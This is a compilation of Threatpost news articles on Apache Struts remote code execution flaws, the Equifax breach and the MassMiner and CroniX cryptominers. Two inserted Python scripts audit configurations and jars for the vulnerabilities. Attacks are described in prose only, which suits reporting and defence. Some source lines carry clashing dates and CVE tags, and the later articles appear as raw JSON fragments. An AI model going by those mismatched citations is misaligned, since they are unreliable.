_Source: Threatpost, "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", published 2017-04-19, modified 2017-04-21. [https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>). Tagged CVEs: CVE-2017-5638, CVE-2018-11776. CVSS v2 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)._

### Apache Struts 2 Flaw Uncovered: ‘More Critical Than Equifax Bug’

A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers – who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.

A [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.

The vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team’s Man Yue Mo, who uncovered the flaw.

“This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,” he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday.
“On top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.”

[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts’ behavior.

“On the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,” said Yue Mo, referring to CVE-2017-9805, the Struts REST-plugin flaw Semmle disclosed in September 2017. (The Equifax breach itself, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), exploited the earlier Struts flaw CVE-2017-5638.)

Tim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.

“In the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,” he explained. “The prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turn requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern – and this concern relates to any library framework.”

#### Anatomy of the Flaw

The vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team’s findings.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,” they explained. “The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.”

Because the issue affects the core of Struts, there are at least two separate attack vectors – and potentially many more.

In the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.

The researchers explained: “An example of a struts.xml configuration that is potentially vulnerable: the `<action …>` tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.”

The second attack vector has to do with the fact that Struts supports page templates inside `<result>` tags in the Struts configuration: “The use of URL tags in such pages is potentially unsafe if the template is referred to from an `<action>` tag that does not provide a namespace attribute (or specifies a wildcard namespace),” the researchers said.
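The configuration pattern the researchers describe, an action with no namespace (or a wildcard one) whose result is of type redirectAction, chain or postback, is mechanical enough to check for. The script below is an added example, not part of the article and not Semmle's or Apache's tooling: it parses a struts.xml and reports every such action, and also reads whether the `struts.mapper.alwaysSelectFullNamespace` constant (the second precondition the write-up names for the known vectors) is switched on. It inspects the XML only; actions declared in Java code through the Convention plugin need a separate review. The sample configuration is constructed for the example.

```python
"""Audit a struts.xml for the CVE-2018-11776 (S2-057) preconditions.

Added example, not from the Threatpost article or the Semmle write-up.
Checks only the XML configuration; actions configured in Java code via
the Convention plugin would need a separate review.
"""
import xml.etree.ElementTree as ET

# Result types the write-up lists as unsafe when the action has no namespace.
UNSAFE_RESULT_TYPES = {"redirectAction", "chain", "postback"}
# Constant that switches on full-namespace selection (true under the
# Convention plugin by default, per the write-up).
FLAG = "struts.mapper.alwaysSelectFullNamespace"


def namespace_is_unsafe(ns):
    """A missing or empty namespace, or a wildcard one, lets the
    attacker-supplied namespace from the request be used."""
    return ns is None or ns.strip() == "" or "*" in ns


def audit_struts_xml(xml_text):
    """Return (flag_enabled, findings). Each finding names the package,
    its namespace, the action and the unsafe result that was flagged."""
    root = ET.fromstring(xml_text)
    flag_enabled = any(
        c.get("name") == FLAG and c.get("value", "").strip().lower() == "true"
        for c in root.iter("constant")
    )
    findings = []
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")        # namespace lives on <package> in struts.xml
        if not namespace_is_unsafe(ns):
            continue
        for action in pkg.iter("action"):
            for result in action.iter("result"):
                rtype = result.get("type", "dispatcher")  # Struts' default type
                if rtype in UNSAFE_RESULT_TYPES:
                    findings.append({
                        "package": pkg.get("name"),
                        "namespace": ns,
                        "action": action.get("name"),
                        "result_type": rtype,
                        "target": (result.text or "").strip(),
                    })
    return flag_enabled, findings


def is_exposed(xml_text):
    """Both preconditions must hold for the two known attack vectors."""
    flag_enabled, findings = audit_struts_xml(xml_text)
    return flag_enabled and bool(findings)


# Constructed sample configuration, not taken from any real deployment.
SAMPLE_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="login" class="example.LoginAction">
      <result name="success" type="redirectAction">home</result>
      <result name="input">/login.jsp</result>
    </action>
  </package>
  <package name="wild" extends="struts-default" namespace="/*">
    <action name="next" class="example.NextAction">
      <result type="chain">finish</result>
    </action>
  </package>
  <package name="secure" extends="struts-default" namespace="/secure">
    <action name="logout" class="example.LogoutAction">
      <result type="redirectAction">login</result>
    </action>
  </package>
</struts>
"""

if __name__ == "__main__":
    enabled, found = audit_struts_xml(SAMPLE_STRUTS_XML)
    print(f"{FLAG} = {enabled}")
    for f in found:
        print(f"  package={f['package']!r} namespace={f['namespace']!r} "
              f"action={f['action']!r} result={f['result_type']} -> {f['target']}")
    print("exposed to the known vectors:", is_exposed(SAMPLE_STRUTS_XML))
```

Run against the sample, the `login` action (no namespace, redirectAction) and the `next` action (wildcard namespace, chain) are reported, while `logout` under the fixed `/secure` namespace is not; with the constant set to false the same findings remain worth fixing but the known vectors no longer apply. As the researchers caution, a later edit to the file can flip the result, so the upgrade is the real fix and this check is a supplement.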
“Your application is vulnerable if the template contains an `<s:url …>` tag without an action or value attribute.”

Researchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to “true” in the Struts configuration – a default state if the application uses the popular Struts Convention plugin. Also, the application’s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. “/*”).

“This applies to actions and namespaces specified in the Struts configuration file (e.g. `<action namespace="main">`), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,” they explained.

That said, they also cautioned that other attack vectors may emerge that apply to different configurations.

“Whether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,” the firm said. “Note that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.”

This is a critical point, according to Mackey. “Validating the input to a function requires a clear definition of what is acceptable,” he said. “It equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it’s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as it’s unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.”

Pavel Avgustinov, vice president of QL Engineering at Semmle, laid out what’s at stake in a media statement: “Critical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,” he said. “A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It’s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.”

_Source: Threatpost, "Apache Struts 2 Flaw Uncovered: ‘More Critical Than Equifax Bug’", published 2018-08-23. [https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>). Tagged CVEs: CVE-2017-9805, CVE-2018-11776. CVSS v2 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)._

### Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug

Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.

The Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, [earlier this month](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).

Scores of
Oracle products, roughly two dozen in total, are affected by the vulnerability. Multiple versions of Oracle’s Financial Services product, in addition to its FLEXCUBE Private Banking product, and WebLogic Server, are included in the advisory. A full list of Oracle products and versions affected by the vulnerability can be found [here](<http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html>).

Oracle also pushed fixes for six other vulnerabilities on Friday, including CVE-2017-7672, CVE-2017-9787, CVE-2017-9791, CVE-2017-9793, CVE-2017-9804, and CVE-2017-12611.

The United States Computer Emergency Readiness Team (US-CERT) issued an alert around the updates on Monday.

> Oracle Patches Apache Vulnerabilities <https://t.co/rGy95kxj2E>
>
> — US-CERT (@USCERT_gov) [September 25, 2017](<https://twitter.com/USCERT_gov/status/912297399564910594>)

Oracle used the advisory as an opportunity to remind users that it fixed CVE-2017-5638, the Struts vulnerability behind [Equifax’s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), back in April with its [quarterly Critical Patch Update](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>). The company said the April update should have already been applied to customer systems and encouraged admins to apply the fixes in this month’s advisory without delay.

Equifax meanwhile continues to grapple with the fallout surrounding the breach that allowed an attacker to siphon names, Social Security numbers, birth dates, addresses, and other information from its servers [this past summer](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).

The credit bureau’s chairman and chief executive Richard Smith retired [on Tuesday](<https://www.equifaxsecurity2017.com/2017/09/26/equifax-chairman-ceo-richard-smith-retires/>) in the wake of the breach. In his stead the company said Paulino do Rego Barros Jr., who previously served as president of the company’s Asia-Pacific division, will assume the role of interim chief executive.

Prior to announcing the news, trading of Equifax shares was halted Tuesday morning.

The CEO will forgo his 2017 bonus according to [a copy of the retirement agreement](<https://www.sec.gov/Archives/edgar/data/33185/000119312517293765/d420554dex101.htm>) between Equifax and Smith posted to the Securities and Exchange Commission. According to the filing Smith will stay on in an unpaid advisory role for at least 90 days. The company says it will defer decisions relating to Smith’s benefits until its Board of Directors completes its independent review of the breach.

“The cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right. At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward,” Smith said in a statement Tuesday.

“Our interim CEO, Paulino, is an experienced leader with deep knowledge of our company and the industry.
The Board of Directors has absolute confidence in his ability to guide the company through this transition,” Mark Feidler, the Board’s non-executive chairman, said.

Smith’s departure comes a week after the company announced its chief information officer David Webb and chief security officer Susan Mauldin would also be retiring.

Despite retiring, according to reports Smith is still on track to testify before the Senate Banking Committee next week, on Oct. 4.

Smith will likely get an earful from senators next week, including Mark Warner (D-VA). On Tuesday in a hearing with Securities and Exchange Commission (SEC) Chairman Jay Clayton, Warner called out Equifax, calling the company a “travesty.”

“We have no ability to opt-in to these systems. We are part of these systems whether we like it or not. I’m often asked in my job on the Intelligence Committee what I think the single greatest vulnerability our country faces is, and I believe it’s cybersecurity,” Warner said.

“I think Equifax is a travesty. I think the resignation of the CEO is by no means enough… Number one, in terms of the sloppiness of their defenses. Two, in terms of the fact that this was clearly a knowable vulnerability – they had known for months, and if they had simply put a patch in place we might have precluded this… I question whether Equifax has the right to even continue providing these services with the level of sloppiness and lack of attention to cybersecurity.”

_Source: Threatpost, "Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug", published 2017-09-26. [https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). Tagged CVEs: CVE-2017-12611, CVE-2017-5638, CVE-2017-7672, CVE-2017-9787, CVE-2017-9791, CVE-2017-9793, CVE-2017-9804, CVE-2017-9805. CVSS v2 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)._

### Apache Struts Warns Users of Two-Year-Old Vulnerability

The Apache Software Foundation warned in an advisory that the latest Struts 2.3 release still ships a version of the Commons FileUpload library that is susceptible to a two-year-old remote code execution flaw.
Users of the vulnerable library must update their projects manually.

The critical bug in the Commons FileUpload library is a known vulnerability ([CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>)) that enables remote code execution in applications built on the open-source Struts framework, which facilitates developing web applications in the Java programming language.

Essentially, the Apache Commons FileUpload library contains a serializable Java class (DiskFileItem) whose serialized form can be manipulated so that, when it is deserialized, it writes or copies files to arbitrary locations on disk.

“A remote attacker could exploit this vulnerability to take control of an affected system,” according to the Monday [advisory](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>). “Your project is affected if it uses the built-in file upload mechanism of Struts 2, which defaults to the use of commons-fileupload. The updated commons-fileupload library is a drop-in replacement for the vulnerable version. Deployed applications can be hardened by replacing the commons-fileupload jar file in WEB-INF/lib with the fixed jar.”

The vulnerable commons-fileupload library is used in Apache Struts versions 2.3.36 and prior, the Foundation said in a Monday advisory.
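Because the fix is a jar swap rather than a framework upgrade, the practical question is where the vulnerable jars are. The script below is an added example, not taken from the article, the Apache advisory or the SANS diary it goes on to quote: it walks a directory tree and reports every jar that carries the commons-fileupload classes and is older than the fixed 1.3.3 release. It recognises a copy by the presence of the `DiskFileItem` class file inside the jar rather than by file name, so shaded or renamed copies outside WEB-INF/lib are reported too; the version comes from the file name or, failing that, from the manifest's Implementation-Version. The deployment tree it scans is constructed in a temporary directory for the example.

```python
"""Find copies of commons-fileupload below 1.3.3 (CVE-2016-1000031).

Added example, not from the Threatpost article or the Apache advisory.
Every .jar under the root is opened, so shaded or renamed copies are
reported as well; the sample tree is constructed inline.
"""
import os
import re
import zipfile
import tempfile

FIXED_VERSION = (1, 3, 3)
# Class shipped in every build of the library; its presence marks a copy.
MARKER_CLASS = "org/apache/commons/fileupload/disk/DiskFileItem.class"
VERSION_RE = re.compile(r"commons-fileupload-(\d+(?:\.\d+)*)\.jar$")


def parse_version(text):
    """'1.3.2' -> (1, 3, 2); None when the text is not dotted integers."""
    try:
        return tuple(int(p) for p in text.strip().split("."))
    except ValueError:
        return None


def jar_version(path):
    """Version from the file name, else from the manifest's
    Implementation-Version; None when neither is available."""
    m = VERSION_RE.search(os.path.basename(path))
    if m:
        return parse_version(m.group(1))
    with zipfile.ZipFile(path) as zf:
        if "META-INF/MANIFEST.MF" not in zf.namelist():
            return None
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        for line in manifest.splitlines():
            if line.startswith("Implementation-Version:"):
                return parse_version(line.split(":", 1)[1])
    return None


def scan(root):
    """Return {relative_jar_path: version_or_None} for every jar under
    root that contains the marker class and is below the fixed version
    (or whose version cannot be determined, which also needs a look)."""
    vulnerable = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as zf:
                    if MARKER_CLASS not in zf.namelist():
                        continue
            except zipfile.BadZipFile:
                continue
            ver = jar_version(path)
            if ver is None or ver < FIXED_VERSION:
                vulnerable[os.path.relpath(path, root)] = ver
    return vulnerable


def _make_jar(path, impl_version=None, with_marker=True):
    """Build a minimal stand-in jar (constructed fixture, not a real build)."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        manifest = "Manifest-Version: 1.0\n"
        if impl_version:
            manifest += f"Implementation-Version: {impl_version}\n"
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        if with_marker:
            zf.writestr(MARKER_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only


def build_sample_tree():
    """Constructed deployment: one patched copy, two vulnerable copies (one
    hidden in an uber jar with no version in its name), one unrelated jar."""
    root = tempfile.mkdtemp(prefix="fileupload-scan-")
    _make_jar(os.path.join(root, "app/WEB-INF/lib/commons-fileupload-1.3.2.jar"))
    _make_jar(os.path.join(root, "other/WEB-INF/lib/commons-fileupload-1.3.3.jar"))
    _make_jar(os.path.join(root, "tools/uber-app.jar"), impl_version="1.3.1")
    _make_jar(os.path.join(root, "lib/commons-io-2.4.jar"), with_marker=False)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for path, ver in sorted(scan(root).items()):
        shown = ".".join(map(str, ver)) if ver else "unknown"
        print(f"VULNERABLE {path} (version {shown}, fixed in 1.3.3)")
```

On the sample tree the 1.3.2 jar under WEB-INF/lib and the uber jar (whose manifest says 1.3.1) are reported; the 1.3.3 copy and the unrelated commons-io jar are not. Point `scan()` at a real server root to get the list of jars to swap for the fixed one.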
They urged users to upgrade to the latest released version of the Commons FileUpload library – which is 1.3.3.

The vulnerability is reminiscent of [CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), another critical remote code execution Apache vulnerability behind the massive 2017 Equifax breach that led to the compromise of 143 million Americans’ data.

While that Apache Struts vulnerability (impacting the Jakarta based file upload Multipart parser) was patched back in March 2017, the consumer credit reporting agency didn’t apply patches for two months after the flaw’s disclosure – eventually leading to the groundbreaking breach.

Similarly, this latest deserialization vulnerability was disclosed and patched in commons-fileupload in [March](<https://issues.apache.org/jira/browse/FILEUPLOAD-279>), but a Struts release that became available since then – the 2.3.36 version, released in October – still shipped a vulnerable version of the library.

Struts versions from 2.5.12 are not affected, as this newer version of Struts includes a patched commons-fileupload component.

Users can fix the risk by replacing the faulty library manually.

“There is no simple ‘new Struts version’ to fix this,” said Johannes Ullrich, dean of research at the SANS Institute, in a blog [post](<https://isc.sans.edu/diary/rss/24278>) on Monday. “You will have to swap out the commons-fileupload library manually.”

“And while you are at it: Double check that you don’t have any other copies of the vulnerable library sitting on your systems,” he added. “Struts isn’t the only one using it, and others may have neglected to update it as well.”

It is only the latest security issue to afflict Apache Struts – earlier in August for instance, a critical remote code-execution vulnerability in Apache Struts 2 was [disclosed](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>).

_Source: Threatpost, "Apache Struts Warns Users of Two-Year-Old Vulnerability", published 2018-11-06. [https://threatpost.com/apache-struts-warns-users-of-two-year-old-vulnerability/138820/](<https://threatpost.com/apache-struts-warns-users-of-two-year-old-vulnerability/138820/>). Tagged CVEs: CVE-2016-1000031, CVE-2017-5638, CVE-2019-11043. CVSS v2 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)._

### MassMiner cryptominer

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix.
It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. 
Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. 
It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. 
Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). 
That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on GitHub and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw that the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. 
In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX is also competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of this operation with earlier activity, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). 
That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names using the .pw top-level domain of the Pacific island of Palau \u2013 believed to be registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>), [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. 
